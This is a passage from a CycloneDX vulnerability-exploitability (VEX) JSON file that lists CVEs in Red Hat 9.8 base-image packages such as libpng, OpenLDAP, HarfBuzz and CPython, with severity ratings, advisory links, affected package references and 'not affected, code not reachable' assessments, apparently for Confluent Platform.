          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-22020",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "description": "No description is available for this CVE.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-22020"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:9686"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-22020"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418711"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438542"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448747"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460038"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460039"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460040"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460041"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460042"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460043"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460044"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460045"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66293"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22007"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22016"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22018"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22020"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22021"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23865"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25646"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26740"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34268"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34282"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:9686"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22020"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-22020"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpuapr2026.html#AppendixJAVA"
        }
      ],
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.6.37-15.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-22185",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125,
        191
      ],
      "description": "OpenLDAP Lightning Memory-Mapped Database (LMDB) versions up to and including 0.9.14, prior to commit 8e1fda8, contain a heap buffer underflow in the readline() function of mdb_load. When processing malformed input containing an embedded NUL byte, an unsigned offset calculation can underflow and cause an out-of-bounds read of one byte before the allocated heap buffer. This can cause mdb_load to crash, leading to a limited denial-of-service condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-22185"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-22185"
        },
        {
          "url": "https://bugs.openldap.org/show_bug.cgi?id=10421"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22185"
        },
        {
          "url": "https://seclists.org/fulldisclosure/2026/Jan/5"
        },
        {
          "url": "https://seclists.org/fulldisclosure/2026/Jan/8"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-22185"
        },
        {
          "url": "https://www.openldap.org/"
        },
        {
          "url": "https://www.vulncheck.com/advisories/openldap-lmdb-mdb-load-heap-buffer-underflow-in-readline"
        }
      ],
      "published": "2026-01-07T21:16:01+00:00",
      "updated": "2026-06-17T10:19:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.6.8-4.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-22693",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "HarfBuzz is a text shaping engine. Prior to version 12.3.0, a null pointer dereference vulnerability exists in the SubtableUnicodesCache::create function located in src/hb-ot-cmap-table.hh. The function fails to check if hb_malloc returns NULL before using placement new to construct an object at the returned pointer address. When hb_malloc fails to allocate memory (which can occur in low-memory conditions or when using custom allocators that simulate allocation failures), it returns NULL. The code then attempts to call the constructor on this null pointer using placement new syntax, resulting in undefined behavior and a Segmentation Fault. This issue has been patched in version 12.3.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-22693"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/11/1"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/12/1"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-22693"
        },
        {
          "url": "https://github.com/harfbuzz/harfbuzz/commit/1265ff8d990284f04d8768f35b0e20ae5f60daae"
        },
        {
          "url": "https://github.com/harfbuzz/harfbuzz/security/advisories/GHSA-xvjr-f2r9-c7ww"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22693"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-22693"
        }
      ],
      "published": "2026-01-10T06:15:52+00:00",
      "updated": "2026-06-17T10:20:14+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.7.4-10.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-2297",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        668
      ],
      "description": "The import hook in CPython that handles legacy *.pyc files (SourcelessFileLoader) is incorrectly handled in FileLoader (a base class) and so does not use io.open_code() to read the .pyc files. sys.audit handlers for this audit event therefore do not fire.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-2297"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/05/6"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10950"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-2297"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-19177.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10950"
        },
        {
          "url": "https://github.com/python/cpython/commit/482d6f8bdba9da3725d272e8bb4a2d25fb6a603e"
        },
        {
          "url": "https://github.com/python/cpython/commit/69ddd9bb2cc4bd69b1565647c18659c6a789ccd9"
        },
        {
          "url": "https://github.com/python/cpython/commit/876858c9f65d9ab656c7fa639f268ce7856d89dd"
        },
        {
          "url": "https://github.com/python/cpython/commit/a51b1b512de1d56b3714b65628a2eae2b07e535e"
        },
        {
          "url": "https://github.com/python/cpython/commit/c70adad78caeeea33f92f560ecb93331ca11bf66"
        },
        {
          "url": "https://github.com/python/cpython/commit/e58e9802b9bec5cdbf48fc9bf1da5f4fda482e86"
        },
        {
          "url": "https://github.com/python/cpython/issues/145506"
        },
        {
          "url": "https://github.com/python/cpython/pull/145507"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-2297.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2297"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-2297"
        }
      ],
      "published": "2026-03-04T23:16:10+00:00",
      "updated": "2026-08-13T01:16:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
